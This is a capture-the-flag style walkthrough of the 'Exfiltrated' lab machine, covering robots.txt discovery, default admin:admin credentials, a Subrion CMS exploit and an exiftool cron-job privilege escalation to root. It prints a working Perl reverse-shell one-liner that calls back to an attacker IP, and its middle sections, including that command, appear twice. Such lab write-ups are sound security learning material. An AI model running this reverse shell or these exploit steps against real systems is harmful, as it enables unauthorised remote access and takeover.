Exfiltrated

Source: Proving Grounds OS: Linux Community Rating: Intermediate

Enumeration & Reconnaissance

I started off with autorecon, which revealed two open ports on the target:
- SSH (22)
- HTTP (80)

Service Analysis

After examining the HTTP service, the hostname http://exfiltrated.offsec appeared, so I updated my /etc/hosts to properly resolve it.
I checked for the robots.txt and that easy, it unveiled several hidden directories. One of these directories led me to an admin login page for Subrion CMS v4.2.1.

Gaining Initial Access

A quick web search confirmed that this version is affected by CVE-2018-19422. However, to take advantage of this vulnerability, valid credentials were necessary. I tried the default combination admin:admin, and it worked!

I obtained a shell, though it was quite terrible, pretty much a basic, non-interactive shell. My attempts to upgrade it to a fully interactive TTY shell were unsuccessful until I tried a Perl one-liner. Running the following command finally gave me a usable shell (The shell was generated using revshells.com):

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.45.217:9001");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Privilege Escalation

Once I had a reliable shell, I ran linpeas.sh to scout for further vulnerabilities. The scan pointed out that the target was vulnerable to CVE-2021-4034, the notorious Polkit exploit that had given me so much trouble on the previous machine. I didn't want to try this route again.
I checked the cron jobs and was pleased to discover one scheduled to run every minute. The cron job executed a script that used exiftool on uploaded files, appending the data to the logs.

A bit of online research revealed that exiftool is vulnerable to CVE-2021-22204. I found a github PoC that created the payload, I crafted the payload image to exploit this vulnerability, moved it to the target, and waited for the cron job to pick it up. When the cron job executed my payload, I obtained root access.

Lessons Learned

Hidden Directories: A simple robots.txt file can uncover critical hidden paths.
Default Credentials: Sometimes, the most obvious username and password (admin:admin) can be all it takes to exploit a vulnerability.
Cron Job Exploitation: The insecure cron job the path to root.

PreviousAmaterasu NextPelican

Last updated 1 month ago

Gaining Initial Access

A quick web search confirmed that this version is affected by CVE-2018-19422. However, to take advantage of this vulnerability, valid credentials were necessary. I tried the default combination admin:admin, and it worked!

I obtained a shell, though it was quite terrible, pretty much a basic, non-interactive shell. My attempts to upgrade it to a fully interactive TTY shell were unsuccessful until I tried a Perl one-liner. Running the following command finally gave me a usable shell (The shell was generated using revshells.com):

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.45.217:9001");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Privilege Escalation

Once I had a reliable shell, I ran linpeas.sh to scout for further vulnerabilities. The scan pointed out that the target was vulnerable to CVE-2021-4034, the notorious Polkit exploit that had given me so much trouble on the previous machine. I didn't want to try this route again.

I checked the cron jobs and was pleased to discover one scheduled to run every minute. The cron job executed a script that used exiftool on uploaded files, appending the data to the logs.

A bit of online research revealed that exiftool is vulnerable to CVE-2021-22204. I found a github PoC that created the payload, I crafted the payload image to exploit this vulnerability, moved it to the target, and waited for the cron job to pick it up. When the cron job executed my payload, I obtained root access.